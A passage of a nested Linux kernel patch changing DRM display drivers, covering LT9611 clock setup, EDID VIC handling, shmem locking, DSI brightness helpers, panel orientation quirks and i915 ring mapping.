+--- a/drivers/gpu/drm/bridge/lontium-lt9611.c
++++ b/drivers/gpu/drm/bridge/lontium-lt9611.c
+@@ -187,12 +187,14 @@ static void lt9611_mipi_video_setup(struct lt9611 *lt9611,
+ 
+ 	regmap_write(lt9611->regmap, 0x8319, (u8)(hfront_porch % 256));
+ 
+-	regmap_write(lt9611->regmap, 0x831a, (u8)(hsync_porch / 256));
++	regmap_write(lt9611->regmap, 0x831a, (u8)(hsync_porch / 256) |
++						((hfront_porch / 256) << 4));
+ 	regmap_write(lt9611->regmap, 0x831b, (u8)(hsync_porch % 256));
+ }
+ 
+-static void lt9611_pcr_setup(struct lt9611 *lt9611, const struct drm_display_mode *mode)
++static void lt9611_pcr_setup(struct lt9611 *lt9611, const struct drm_display_mode *mode, unsigned int postdiv)
+ {
++	unsigned int pcr_m = mode->clock * 5 * postdiv / 27000;
+ 	const struct reg_sequence reg_cfg[] = {
+ 		{ 0x830b, 0x01 },
+ 		{ 0x830c, 0x10 },
+@@ -207,7 +209,6 @@ static void lt9611_pcr_setup(struct lt9611 *lt9611, const struct drm_display_mod
+ 
+ 		/* stage 2 */
+ 		{ 0x834a, 0x40 },
+-		{ 0x831d, 0x10 },
+ 
+ 		/* MK limit */
+ 		{ 0x832d, 0x38 },
+@@ -222,30 +223,28 @@ static void lt9611_pcr_setup(struct lt9611 *lt9611, const struct drm_display_mod
+ 		{ 0x8325, 0x00 },
+ 		{ 0x832a, 0x01 },
+ 		{ 0x834a, 0x10 },
+-		{ 0x831d, 0x10 },
+-		{ 0x8326, 0x37 },
+ 	};
++	u8 pol = 0x10;
+ 
+-	regmap_multi_reg_write(lt9611->regmap, reg_cfg, ARRAY_SIZE(reg_cfg));
++	if (mode->flags & DRM_MODE_FLAG_NHSYNC)
++		pol |= 0x2;
++	if (mode->flags & DRM_MODE_FLAG_NVSYNC)
++		pol |= 0x1;
++	regmap_write(lt9611->regmap, 0x831d, pol);
+ 
+-	switch (mode->hdisplay) {
+-	case 640:
+-		regmap_write(lt9611->regmap, 0x8326, 0x14);
+-		break;
+-	case 1920:
+-		regmap_write(lt9611->regmap, 0x8326, 0x37);
+-		break;
+-	case 3840:
++	if (mode->hdisplay == 3840)
+ 		regmap_multi_reg_write(lt9611->regmap, reg_cfg2, ARRAY_SIZE(reg_cfg2));
+-		break;
+-	}
++	else
++		regmap_multi_reg_write(lt9611->regmap, reg_cfg, ARRAY_SIZE(reg_cfg));
++
++	regmap_write(lt9611->regmap, 0x8326, pcr_m);
+ 
+ 	/* pcr rst */
+ 	regmap_write(lt9611->regmap, 0x8011, 0x5a);
+ 	regmap_write(lt9611->regmap, 0x8011, 0xfa);
+ }
+ 
+-static int lt9611_pll_setup(struct lt9611 *lt9611, const struct drm_display_mode *mode)
++static int lt9611_pll_setup(struct lt9611 *lt9611, const struct drm_display_mode *mode, unsigned int *postdiv)
+ {
+ 	unsigned int pclk = mode->clock;
+ 	const struct reg_sequence reg_cfg[] = {
+@@ -263,12 +262,16 @@ static int lt9611_pll_setup(struct lt9611 *lt9611, const struct drm_display_mode
+ 
+ 	regmap_multi_reg_write(lt9611->regmap, reg_cfg, ARRAY_SIZE(reg_cfg));
+ 
+-	if (pclk > 150000)
++	if (pclk > 150000) {
+ 		regmap_write(lt9611->regmap, 0x812d, 0x88);
+-	else if (pclk > 70000)
++		*postdiv = 1;
++	} else if (pclk > 70000) {
+ 		regmap_write(lt9611->regmap, 0x812d, 0x99);
+-	else
++		*postdiv = 2;
++	} else {
+ 		regmap_write(lt9611->regmap, 0x812d, 0xaa);
++		*postdiv = 4;
++	}
+ 
+ 	/*
+ 	 * first divide pclk by 2 first
+@@ -448,12 +451,11 @@ static void lt9611_sleep_setup(struct lt9611 *lt9611)
+ 		{ 0x8023, 0x01 },
+ 		{ 0x8157, 0x03 }, /* set addr pin as output */
+ 		{ 0x8149, 0x0b },
+-		{ 0x8151, 0x30 }, /* disable IRQ */
++
+ 		{ 0x8102, 0x48 }, /* MIPI Rx power down */
+ 		{ 0x8123, 0x80 },
+ 		{ 0x8130, 0x00 },
+-		{ 0x8100, 0x01 }, /* bandgap power down */
+-		{ 0x8101, 0x00 }, /* system clk power down */
++		{ 0x8011, 0x0a },
+ 	};
+ 
+ 	regmap_multi_reg_write(lt9611->regmap,
+@@ -767,7 +769,7 @@ static const struct drm_connector_funcs lt9611_bridge_connector_funcs = {
+ static struct mipi_dsi_device *lt9611_attach_dsi(struct lt9611 *lt9611,
+ 						 struct device_node *dsi_node)
+ {
+-	const struct mipi_dsi_device_info info = { "lt9611", 0, NULL };
++	const struct mipi_dsi_device_info info = { "lt9611", 0, lt9611->dev->of_node};
+ 	struct mipi_dsi_device *dsi;
+ 	struct mipi_dsi_host *host;
+ 	struct device *dev = lt9611->dev;
+@@ -857,12 +859,18 @@ static enum drm_mode_status lt9611_bridge_mode_valid(struct drm_bridge *bridge,
+ static void lt9611_bridge_pre_enable(struct drm_bridge *bridge)
+ {
+ 	struct lt9611 *lt9611 = bridge_to_lt9611(bridge);
++	static const struct reg_sequence reg_cfg[] = {
++		{ 0x8102, 0x12 },
++		{ 0x8123, 0x40 },
++		{ 0x8130, 0xea },
++		{ 0x8011, 0xfa },
++	};
+ 
+ 	if (!lt9611->sleep)
+ 		return;
+ 
+-	lt9611_reset(lt9611);
+-	regmap_write(lt9611->regmap, 0x80ee, 0x01);
++	regmap_multi_reg_write(lt9611->regmap,
++			       reg_cfg, ARRAY_SIZE(reg_cfg));
+ 
+ 	lt9611->sleep = false;
+ }
+@@ -882,14 +890,15 @@ static void lt9611_bridge_mode_set(struct drm_bridge *bridge,
+ {
+ 	struct lt9611 *lt9611 = bridge_to_lt9611(bridge);
+ 	struct hdmi_avi_infoframe avi_frame;
++	unsigned int postdiv;
+ 	int ret;
+ 
+ 	lt9611_bridge_pre_enable(bridge);
+ 
+ 	lt9611_mipi_input_digital(lt9611, mode);
+-	lt9611_pll_setup(lt9611, mode);
++	lt9611_pll_setup(lt9611, mode, &postdiv);
+ 	lt9611_mipi_video_setup(lt9611, mode);
+-	lt9611_pcr_setup(lt9611, mode);
++	lt9611_pcr_setup(lt9611, mode, postdiv);
+ 
+ 	ret = drm_hdmi_avi_infoframe_from_display_mode(&avi_frame,
+ 						       &lt9611->connector,
+diff --git a/drivers/gpu/drm/bridge/megachips-stdpxxxx-ge-b850v3-fw.c b/drivers/gpu/drm/bridge/megachips-stdpxxxx-ge-b850v3-fw.c
+index 97359f807bfc3..cbfa05a6767b5 100644
+--- a/drivers/gpu/drm/bridge/megachips-stdpxxxx-ge-b850v3-fw.c
++++ b/drivers/gpu/drm/bridge/megachips-stdpxxxx-ge-b850v3-fw.c
+@@ -440,7 +440,11 @@ static int __init stdpxxxx_ge_b850v3_init(void)
+ 	if (ret)
+ 		return ret;
+ 
+-	return i2c_add_driver(&stdp2690_ge_b850v3_fw_driver);
++	ret = i2c_add_driver(&stdp2690_ge_b850v3_fw_driver);
++	if (ret)
++		i2c_del_driver(&stdp4028_ge_b850v3_fw_driver);
++
++	return ret;
+ }
+ module_init(stdpxxxx_ge_b850v3_init);
+ 
+diff --git a/drivers/gpu/drm/bridge/tc358767.c b/drivers/gpu/drm/bridge/tc358767.c
+index 2a58eb271f701..b9b681086fc49 100644
+--- a/drivers/gpu/drm/bridge/tc358767.c
++++ b/drivers/gpu/drm/bridge/tc358767.c
+@@ -1264,10 +1264,10 @@ static int tc_dsi_rx_enable(struct tc_data *tc)
+ 	u32 value;
+ 	int ret;
+ 
+-	regmap_write(tc->regmap, PPI_D0S_CLRSIPOCOUNT, 5);
+-	regmap_write(tc->regmap, PPI_D1S_CLRSIPOCOUNT, 5);
+-	regmap_write(tc->regmap, PPI_D2S_CLRSIPOCOUNT, 5);
+-	regmap_write(tc->regmap, PPI_D3S_CLRSIPOCOUNT, 5);
++	regmap_write(tc->regmap, PPI_D0S_CLRSIPOCOUNT, 25);
++	regmap_write(tc->regmap, PPI_D1S_CLRSIPOCOUNT, 25);
++	regmap_write(tc->regmap, PPI_D2S_CLRSIPOCOUNT, 25);
++	regmap_write(tc->regmap, PPI_D3S_CLRSIPOCOUNT, 25);
+ 	regmap_write(tc->regmap, PPI_D0S_ATMR, 0);
+ 	regmap_write(tc->regmap, PPI_D1S_ATMR, 0);
+ 	regmap_write(tc->regmap, PPI_TX_RX_TA, TTA_GET | TTA_SURE);
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi83.c b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+index 7ba9467fff129..047c14ddbbf11 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi83.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+@@ -346,7 +346,7 @@ static void sn65dsi83_atomic_enable(struct drm_bridge *bridge,
+ 
+ 	/* Deassert reset */
+ 	gpiod_set_value_cansleep(ctx->enable_gpio, 1);
+-	usleep_range(1000, 1100);
++	usleep_range(10000, 11000);
+ 
+ 	/* Get the LVDS format from the bridge state. */
+ 	bridge_state = drm_atomic_get_new_bridge_state(state, bridge);
+diff --git a/drivers/gpu/drm/drm_edid.c b/drivers/gpu/drm/drm_edid.c
+index 9d82de4c0a8b0..739e0d40cca61 100644
+--- a/drivers/gpu/drm/drm_edid.c
++++ b/drivers/gpu/drm/drm_edid.c
+@@ -5093,13 +5093,12 @@ static int add_cea_modes(struct drm_connector *connector,
+ {
+ 	const struct cea_db *db;
+ 	struct cea_db_iter iter;
++	const u8 *hdmi = NULL, *video = NULL;
++	u8 hdmi_len = 0, video_len = 0;
+ 	int modes = 0;
+ 
+ 	cea_db_iter_edid_begin(drm_edid, &iter);
+ 	cea_db_iter_for_each(db, &iter) {
+-		const u8 *hdmi = NULL, *video = NULL;
+-		u8 hdmi_len = 0, video_len = 0;
+-
+ 		if (cea_db_tag(db) == CTA_DB_VIDEO) {
+ 			video = cea_db_data(db);
+ 			video_len = cea_db_payload_len(db);
+@@ -5115,18 +5114,17 @@ static int add_cea_modes(struct drm_connector *connector,
+ 			modes += do_y420vdb_modes(connector, vdb420,
+ 						  cea_db_payload_len(db) - 1);
+ 		}
+-
+-		/*
+-		 * We parse the HDMI VSDB after having added the cea modes as we
+-		 * will be patching their flags when the sink supports stereo
+-		 * 3D.
+-		 */
+-		if (hdmi)
+-			modes += do_hdmi_vsdb_modes(connector, hdmi, hdmi_len,
+-						    video, video_len);
+ 	}
+ 	cea_db_iter_end(&iter);
+ 
++	/*
++	 * We parse the HDMI VSDB after having added the cea modes as we will be
++	 * patching their flags when the sink supports stereo 3D.
++	 */
++	if (hdmi)
++		modes += do_hdmi_vsdb_modes(connector, hdmi, hdmi_len,
++					    video, video_len);
++
+ 	return modes;
+ }
+ 
+@@ -6705,8 +6703,6 @@ static u8 drm_mode_hdmi_vic(const struct drm_connector *connector,
+ static u8 drm_mode_cea_vic(const struct drm_connector *connector,
+ 			   const struct drm_display_mode *mode)
+ {
+-	u8 vic;
+-
+ 	/*
+ 	 * HDMI spec says if a mode is found in HDMI 1.4b 4K modes
+ 	 * we should send its VIC in vendor infoframes, else send the
+@@ -6716,13 +6712,18 @@ static u8 drm_mode_cea_vic(const struct drm_connector *connector,
+ 	if (drm_mode_hdmi_vic(connector, mode))
+ 		return 0;
+ 
+-	vic = drm_match_cea_mode(mode);
++	return drm_match_cea_mode(mode);
++}
+ 
+-	/*
+-	 * HDMI 1.4 VIC range: 1 <= VIC <= 64 (CEA-861-D) but
+-	 * HDMI 2.0 VIC range: 1 <= VIC <= 107 (CEA-861-F). So we
+-	 * have to make sure we dont break HDMI 1.4 sinks.
+-	 */
++/*
++ * Avoid sending VICs defined in HDMI 2.0 in AVI infoframes to sinks that
++ * conform to HDMI 1.4.
++ *
++ * HDMI 1.4 (CTA-861-D) VIC range: [1..64]
++ * HDMI 2.0 (CTA-861-F) VIC range: [1..107]
++ */
++static u8 vic_for_avi_infoframe(const struct drm_connector *connector, u8 vic)
++{
+ 	if (!is_hdmi2_sink(connector) && vic > 64)
+ 		return 0;
+ 
+@@ -6798,7 +6799,7 @@ drm_hdmi_avi_infoframe_from_display_mode(struct hdmi_avi_infoframe *frame,
+ 		picture_aspect = HDMI_PICTURE_ASPECT_NONE;
+ 	}
+ 
+-	frame->video_code = vic;
++	frame->video_code = vic_for_avi_infoframe(connector, vic);
+ 	frame->picture_aspect = picture_aspect;
+ 	frame->active_aspect = HDMI_ACTIVE_ASPECT_PICTURE;
+ 	frame->scan_mode = HDMI_SCAN_MODE_UNDERSCAN;
+diff --git a/drivers/gpu/drm/drm_fourcc.c b/drivers/gpu/drm/drm_fourcc.c
+index 6242dfbe92402..0f17dfa8702b4 100644
+--- a/drivers/gpu/drm/drm_fourcc.c
++++ b/drivers/gpu/drm/drm_fourcc.c
+@@ -190,6 +190,10 @@ const struct drm_format_info *__drm_format_info(u32 format)
+ 		{ .format = DRM_FORMAT_BGRA5551,	.depth = 15, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1, .has_alpha = true },
+ 		{ .format = DRM_FORMAT_RGB565,		.depth = 16, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1 },
+ 		{ .format = DRM_FORMAT_BGR565,		.depth = 16, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1 },
++#ifdef __BIG_ENDIAN
++		{ .format = DRM_FORMAT_XRGB1555 | DRM_FORMAT_BIG_ENDIAN, .depth = 15, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1 },
++		{ .format = DRM_FORMAT_RGB565 | DRM_FORMAT_BIG_ENDIAN, .depth = 16, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1 },
++#endif
+ 		{ .format = DRM_FORMAT_RGB888,		.depth = 24, .num_planes = 1, .cpp = { 3, 0, 0 }, .hsub = 1, .vsub = 1 },
+ 		{ .format = DRM_FORMAT_BGR888,		.depth = 24, .num_planes = 1, .cpp = { 3, 0, 0 }, .hsub = 1, .vsub = 1 },
+ 		{ .format = DRM_FORMAT_XRGB8888,	.depth = 24, .num_planes = 1, .cpp = { 4, 0, 0 }, .hsub = 1, .vsub = 1 },
+diff --git a/drivers/gpu/drm/drm_gem_shmem_helper.c b/drivers/gpu/drm/drm_gem_shmem_helper.c
+index b602cd72a1205..7af9da886d4e5 100644
+--- a/drivers/gpu/drm/drm_gem_shmem_helper.c
++++ b/drivers/gpu/drm/drm_gem_shmem_helper.c
+@@ -681,23 +681,7 @@ struct sg_table *drm_gem_shmem_get_sg_table(struct drm_gem_shmem_object *shmem)
+ }
+ EXPORT_SYMBOL_GPL(drm_gem_shmem_get_sg_table);
+ 
+-/**
+- * drm_gem_shmem_get_pages_sgt - Pin pages, dma map them, and return a
+- *				 scatter/gather table for a shmem GEM object.
+- * @shmem: shmem GEM object
+- *
+- * This function returns a scatter/gather table suitable for driver usage. If
+- * the sg table doesn't exist, the pages are pinned, dma-mapped, and a sg
+- * table created.
+- *
+- * This is the main function for drivers to get at backing storage, and it hides
+- * and difference between dma-buf imported and natively allocated objects.
+- * drm_gem_shmem_get_sg_table() should not be directly called by drivers.
+- *
+- * Returns:
+- * A pointer to the scatter/gather table of pinned pages or errno on failure.
+- */
+-struct sg_table *drm_gem_shmem_get_pages_sgt(struct drm_gem_shmem_object *shmem)
++static struct sg_table *drm_gem_shmem_get_pages_sgt_locked(struct drm_gem_shmem_object *shmem)
+ {
+ 	struct drm_gem_object *obj = &shmem->base;
+ 	int ret;
+@@ -708,7 +692,7 @@ struct sg_table *drm_gem_shmem_get_pages_sgt(struct drm_gem_shmem_object *shmem)
+ 
+ 	WARN_ON(obj->import_attach);
+ 
+-	ret = drm_gem_shmem_get_pages(shmem);
++	ret = drm_gem_shmem_get_pages_locked(shmem);
+ 	if (ret)
+ 		return ERR_PTR(ret);
+ 
+@@ -730,9 +714,39 @@ err_free_sgt:
+ 	sg_free_table(sgt);
+ 	kfree(sgt);
+ err_put_pages:
+-	drm_gem_shmem_put_pages(shmem);
++	drm_gem_shmem_put_pages_locked(shmem);
+ 	return ERR_PTR(ret);
+ }
++
++/**
++ * drm_gem_shmem_get_pages_sgt - Pin pages, dma map them, and return a
++ *				 scatter/gather table for a shmem GEM object.
++ * @shmem: shmem GEM object
++ *
++ * This function returns a scatter/gather table suitable for driver usage. If
++ * the sg table doesn't exist, the pages are pinned, dma-mapped, and a sg
++ * table created.
++ *
++ * This is the main function for drivers to get at backing storage, and it hides
++ * and difference between dma-buf imported and natively allocated objects.
++ * drm_gem_shmem_get_sg_table() should not be directly called by drivers.
++ *
++ * Returns:
++ * A pointer to the scatter/gather table of pinned pages or errno on failure.
++ */
++struct sg_table *drm_gem_shmem_get_pages_sgt(struct drm_gem_shmem_object *shmem)
++{
++	int ret;
++	struct sg_table *sgt;
++
++	ret = mutex_lock_interruptible(&shmem->pages_lock);
++	if (ret)
++		return ERR_PTR(ret);
++	sgt = drm_gem_shmem_get_pages_sgt_locked(shmem);
++	mutex_unlock(&shmem->pages_lock);
++
++	return sgt;
++}
+ EXPORT_SYMBOL_GPL(drm_gem_shmem_get_pages_sgt);
+ 
+ /**
+diff --git a/drivers/gpu/drm/drm_mipi_dsi.c b/drivers/gpu/drm/drm_mipi_dsi.c
+index 3ec02748d56fe..f25ddfe37498f 100644
+--- a/drivers/gpu/drm/drm_mipi_dsi.c
++++ b/drivers/gpu/drm/drm_mipi_dsi.c
+@@ -1224,6 +1224,58 @@ int mipi_dsi_dcs_get_display_brightness(struct mipi_dsi_device *dsi,
+ }
+ EXPORT_SYMBOL(mipi_dsi_dcs_get_display_brightness);
+ 
++/**
++ * mipi_dsi_dcs_set_display_brightness_large() - sets the 16-bit brightness value
++ *    of the display
++ * @dsi: DSI peripheral device
++ * @brightness: brightness value
++ *
++ * Return: 0 on success or a negative error code on failure.
++ */
++int mipi_dsi_dcs_set_display_brightness_large(struct mipi_dsi_device *dsi,
++					     u16 brightness)
++{
++	u8 payload[2] = { brightness >> 8, brightness & 0xff };
++	ssize_t err;
++
++	err = mipi_dsi_dcs_write(dsi, MIPI_DCS_SET_DISPLAY_BRIGHTNESS,
++				 payload, sizeof(payload));
++	if (err < 0)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL(mipi_dsi_dcs_set_display_brightness_large);
++
++/**
++ * mipi_dsi_dcs_get_display_brightness_large() - gets the current 16-bit
++ *    brightness value of the display
++ * @dsi: DSI peripheral device
++ * @brightness: brightness value
++ *
++ * Return: 0 on success or a negative error code on failure.
++ */
++int mipi_dsi_dcs_get_display_brightness_large(struct mipi_dsi_device *dsi,
++					     u16 *brightness)
++{
++	u8 brightness_be[2];
++	ssize_t err;
++
++	err = mipi_dsi_dcs_read(dsi, MIPI_DCS_GET_DISPLAY_BRIGHTNESS,
++				brightness_be, sizeof(brightness_be));
++	if (err <= 0) {
++		if (err == 0)
++			err = -ENODATA;
++
++		return err;
++	}
++
++	*brightness = (brightness_be[0] << 8) | brightness_be[1];
++
++	return 0;
++}
++EXPORT_SYMBOL(mipi_dsi_dcs_get_display_brightness_large);
++
+ static int mipi_dsi_drv_probe(struct device *dev)
+ {
+ 	struct mipi_dsi_driver *drv = to_mipi_dsi_driver(dev->driver);
+diff --git a/drivers/gpu/drm/drm_mode_config.c b/drivers/gpu/drm/drm_mode_config.c
+index 688c8afe0bf17..8525ef8515406 100644
+--- a/drivers/gpu/drm/drm_mode_config.c
++++ b/drivers/gpu/drm/drm_mode_config.c
+@@ -399,6 +399,8 @@ static void drm_mode_config_init_release(struct drm_device *dev, void *ptr)
+  */
+ int drmm_mode_config_init(struct drm_device *dev)
+ {
++	int ret;
++
+ 	mutex_init(&dev->mode_config.mutex);
+ 	drm_modeset_lock_init(&dev->mode_config.connection_mutex);
+ 	mutex_init(&dev->mode_config.idr_mutex);
+@@ -420,7 +422,11 @@ int drmm_mode_config_init(struct drm_device *dev)
+ 	init_llist_head(&dev->mode_config.connector_free_list);
+ 	INIT_WORK(&dev->mode_config.connector_free_work, drm_connector_free_work_fn);
+ 
+-	drm_mode_create_standard_properties(dev);
++	ret = drm_mode_create_standard_properties(dev);
++	if (ret) {
++		drm_mode_config_cleanup(dev);
++		return ret;
++	}
+ 
+ 	/* Just to be sure */
+ 	dev->mode_config.num_fb = 0;
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 3659f0465a724..5522d610c5cfd 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -30,12 +30,6 @@ struct drm_dmi_panel_orientation_data {
+ 	int orientation;
+ };
+ 
+-static const struct drm_dmi_panel_orientation_data asus_t100ha = {
+-	.width = 800,
+-	.height = 1280,
+-	.orientation = DRM_MODE_PANEL_ORIENTATION_LEFT_UP,
+-};
+-
+ static const struct drm_dmi_panel_orientation_data gpd_micropc = {
+ 	.width = 720,
+ 	.height = 1280,
+@@ -97,6 +91,12 @@ static const struct drm_dmi_panel_orientation_data lcd720x1280_rightside_up = {
+ 	.orientation = DRM_MODE_PANEL_ORIENTATION_RIGHT_UP,
+ };
+ 
++static const struct drm_dmi_panel_orientation_data lcd800x1280_leftside_up = {
++	.width = 800,
++	.height = 1280,
++	.orientation = DRM_MODE_PANEL_ORIENTATION_LEFT_UP,
++};
++
+ static const struct drm_dmi_panel_orientation_data lcd800x1280_rightside_up = {
+ 	.width = 800,
+ 	.height = 1280,
+@@ -127,6 +127,12 @@ static const struct drm_dmi_panel_orientation_data lcd1600x2560_leftside_up = {
+ 	.orientation = DRM_MODE_PANEL_ORIENTATION_LEFT_UP,
+ };
+ 
++static const struct drm_dmi_panel_orientation_data lcd1600x2560_rightside_up = {
++	.width = 1600,
++	.height = 2560,
++	.orientation = DRM_MODE_PANEL_ORIENTATION_RIGHT_UP,
++};
++
+ static const struct dmi_system_id orientation_data[] = {
+ 	{	/* Acer One 10 (S1003) */
+ 		.matches = {
+@@ -151,7 +157,7 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "T100HAN"),
+ 		},
+-		.driver_data = (void *)&asus_t100ha,
++		.driver_data = (void *)&lcd800x1280_leftside_up,
+ 	}, {	/* Asus T101HA */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+@@ -196,6 +202,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "Hi10 pro tablet"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
++	}, {	/* Dynabook K50 */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Dynabook Inc."),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "dynabook K50/FR"),
++		},
++		.driver_data = (void *)&lcd800x1280_leftside_up,
+ 	}, {	/* GPD MicroPC (generic strings, also match on bios date) */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Default string"),
+@@ -310,6 +322,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "Lenovo ideapad D330-10IGL"),
+ 		},
+ 		.driver_data = (void *)&lcd800x1280_rightside_up,
++	}, {	/* Lenovo IdeaPad Duet 3 10IGL5 */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "IdeaPad Duet 3 10IGL5"),
++		},
++		.driver_data = (void *)&lcd1200x1920_rightside_up,
+ 	}, {	/* Lenovo Yoga Book X90F / X91F / X91L */
+ 		.matches = {
+ 		  /* Non exact match to match all versions */
+@@ -331,6 +349,13 @@ static const struct dmi_system_id orientation_data[] = {
+ 		 DMI_MATCH(DMI_BIOS_VERSION, "BLADE_21"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
++	}, {	/* Lenovo Yoga Tab 3 X90F */
++		.matches = {
++		 DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++		 DMI_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++		 DMI_MATCH(DMI_PRODUCT_VERSION, "Blade3-10A-001"),
++		},
++		.driver_data = (void *)&lcd1600x2560_rightside_up,
+ 	}, {	/* Nanote UMPC-01 */
+ 		.matches = {
+ 		 DMI_MATCH(DMI_SYS_VENDOR, "RWC CO.,LTD"),
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_dsi.c b/drivers/gpu/drm/exynos/exynos_drm_dsi.c
+index ec673223d6b7a..b5305b145ddbd 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_dsi.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_dsi.c
+@@ -805,15 +805,15 @@ static int exynos_dsi_init_link(struct exynos_dsi *dsi)
+ 			reg |= DSIM_AUTO_MODE;
+ 		if (dsi->mode_flags & MIPI_DSI_MODE_VIDEO_HSE)
+ 			reg |= DSIM_HSE_MODE;
+-		if (!(dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HFP))
++		if (dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HFP)
+ 			reg |= DSIM_HFP_MODE;
+-		if (!(dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HBP))
++		if (dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HBP)
+ 			reg |= DSIM_HBP_MODE;
+-		if (!(dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HSA))
++		if (dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HSA)
+ 			reg |= DSIM_HSA_MODE;
+ 	}
+ 
+-	if (!(dsi->mode_flags & MIPI_DSI_MODE_NO_EOT_PACKET))
++	if (dsi->mode_flags & MIPI_DSI_MODE_NO_EOT_PACKET)
+ 		reg |= DSIM_EOT_DISABLE;
+ 
+ 	switch (dsi->format) {
+diff --git a/drivers/gpu/drm/gud/gud_pipe.c b/drivers/gpu/drm/gud/gud_pipe.c
+index 7c6dc2bcd14a6..61f4abaf1811f 100644
+--- a/drivers/gpu/drm/gud/gud_pipe.c
++++ b/drivers/gpu/drm/gud/gud_pipe.c
+@@ -157,8 +157,8 @@ static int gud_prep_flush(struct gud_device *gdrm, struct drm_framebuffer *fb,
+ {
+ 	struct dma_buf_attachment *import_attach = fb->obj[0]->import_attach;
+ 	u8 compression = gdrm->compression;
+-	struct iosys_map map[DRM_FORMAT_MAX_PLANES];
+-	struct iosys_map map_data[DRM_FORMAT_MAX_PLANES];
++	struct iosys_map map[DRM_FORMAT_MAX_PLANES] = { };
++	struct iosys_map map_data[DRM_FORMAT_MAX_PLANES] = { };
+ 	struct iosys_map dst;
+ 	void *vaddr, *buf;
+ 	size_t pitch, len;
+diff --git a/drivers/gpu/drm/i915/display/intel_quirks.c b/drivers/gpu/drm/i915/display/intel_quirks.c
+index 6e48d3bcdfec5..a280448df771a 100644
+--- a/drivers/gpu/drm/i915/display/intel_quirks.c
++++ b/drivers/gpu/drm/i915/display/intel_quirks.c
+@@ -199,6 +199,8 @@ static struct intel_quirk intel_quirks[] = {
+ 	/* ECS Liva Q2 */
+ 	{ 0x3185, 0x1019, 0xa94d, quirk_increase_ddi_disabled_time },
+ 	{ 0x3184, 0x1019, 0xa94d, quirk_increase_ddi_disabled_time },
++	/* HP Notebook - 14-r206nv */
++	{ 0x0f31, 0x103c, 0x220f, quirk_invert_brightness },
+ };
+ 
+ void intel_init_quirks(struct drm_i915_private *i915)
+diff --git a/drivers/gpu/drm/i915/gt/intel_ring.c b/drivers/gpu/drm/i915/gt/intel_ring.c
+index 15ec64d881c44..fb99143be98e7 100644
+--- a/drivers/gpu/drm/i915/gt/intel_ring.c
++++ b/drivers/gpu/drm/i915/gt/intel_ring.c
+@@ -53,7 +53,7 @@ int intel_ring_pin(struct intel_ring *ring, struct i915_gem_ww_ctx *ww)
+ 	if (unlikely(ret))
+ 		goto err_unpin;
+ 
+-	if (i915_vma_is_map_and_fenceable(vma)) {
++	if (i915_vma_is_map_and_fenceable(vma) && !HAS_LLC(vma->vm->i915)) {
+ 		addr = (void __force *)i915_vma_pin_iomap(vma);
+ 	} else {
+ 		int type = i915_coherent_map_type(vma->vm->i915, vma->obj, false);
+@@ -98,7 +98,7 @@ void intel_ring_unpin(struct intel_ring *ring)
+ 		return;
+ 
+ 	i915_vma_unset_ggtt_write(vma);
+-	if (i915_vma_is_map_and_fenceable(vma))
++	if (i915_vma_is_map_and_fenceable(vma) && !HAS_LLC(vma->vm->i915))
+ 		i915_vma_unpin_iomap(vma);
+ 	else
+ 		i915_gem_object_unpin_map(vma->obj);
+@@ -116,7 +116,7 @@ static struct i915_vma *create_ring_vma(struct i915_ggtt *ggtt, int size)
+ 
+ 	obj = i915_gem_object_create_lmem(i915, size, I915_BO_ALLOC_VOLATILE |
+ 					  I915_BO_ALLOC_PM_VOLATILE);
+-	if (IS_ERR(obj) && i915_ggtt_has_aperture(ggtt))
++	if (IS_ERR(obj) && i915_ggtt_has_aperture(ggtt) && !HAS_LLC(i915))
+ 		obj = i915_gem_object_create_stolen(i915, size);
+ 	if (IS_ERR(obj))
+ 		obj = i915_gem_object_create_internal(i915, size);
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+index 112615817dcbe..5071f1263216b 100644
